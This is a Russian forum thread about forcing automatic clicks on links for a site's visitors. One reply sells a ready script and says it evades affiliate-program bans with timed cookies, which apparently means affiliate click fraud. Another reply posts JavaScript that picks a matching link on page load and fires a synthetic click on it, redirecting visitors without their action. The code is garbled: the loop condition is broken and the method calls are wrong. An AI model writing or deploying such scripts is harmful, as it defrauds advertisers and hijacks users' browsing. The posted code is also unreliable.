Цитата:
Курсор это инструмент для рук. Судя по исходу вам нужно сделать принужденный автоматизированный клик по ссылки пользователя на вашем сайте. Во вторых. По соображению безопасности не говоря в целом о понятии javascript программного языка - двигать мышью невозможно. Сам скрипт который работает по всем вашим требованиям я написал в месте с инструкции. если вы уже готовы оплатить 500 р по webmoney то обращайтесь ко мне по icq 744961 там же перекину скрипт. На всякий случий дописал куки по определенному времени, чтобы избежать бана от партнерской программы. |
хотя я могу дописать анимацию как мышь будет двигается, только зачем это?
|
Хм...если я не ошибаюсь - тут дело пахнет DOM-ом)))
<script type="text/javascript"> function clickLink(link) { var cancelled = false; if (document.createEvent) { var event = document.createEvent("MouseEvents"); event.initMouseEvent("click", true, true, window, 0, 0, 0, 0, 0, false, false, false, false, 0, null); cancelled = !link.dispatchEvent(event); } else if (link.fireEvent) { cancelled = !link.fireEvent("onclick"); } if (!cancelled) { window.location = link.href; } } //маска (шаблон) для поиска ссылок var mask = " ******************* "; //получаем список всех ссылок на странице //(ссылки на html странице обозначаются через тек "", от английского "anchor") var links = document.getElementsByTagName("a"); //определяем случайное число пропускаемых ссылок (0 .. 9) var skipLinksCount = Math.floor(Math.random()*10); //перебираем ссылки for(var i = 0; i -1) { //если разрешено кликать (уже пропустили нужное кол-во ссылок) if (skipLinksCount == 0) { //отображаем ее во всплывающем сообщении (или кликаем по ней - тогда links[i].click) clickLink(links[i]); //прерываем перебор break; } else { //учитываем "пропущенную" ссылку skipLinksCount--; } } } } window.onload = onload(); function onload() { clickLink(document.document.getElementByID("homeLink")); } </script> Кажетса ето? |
Часовой пояс GMT +3, время: 06:57. |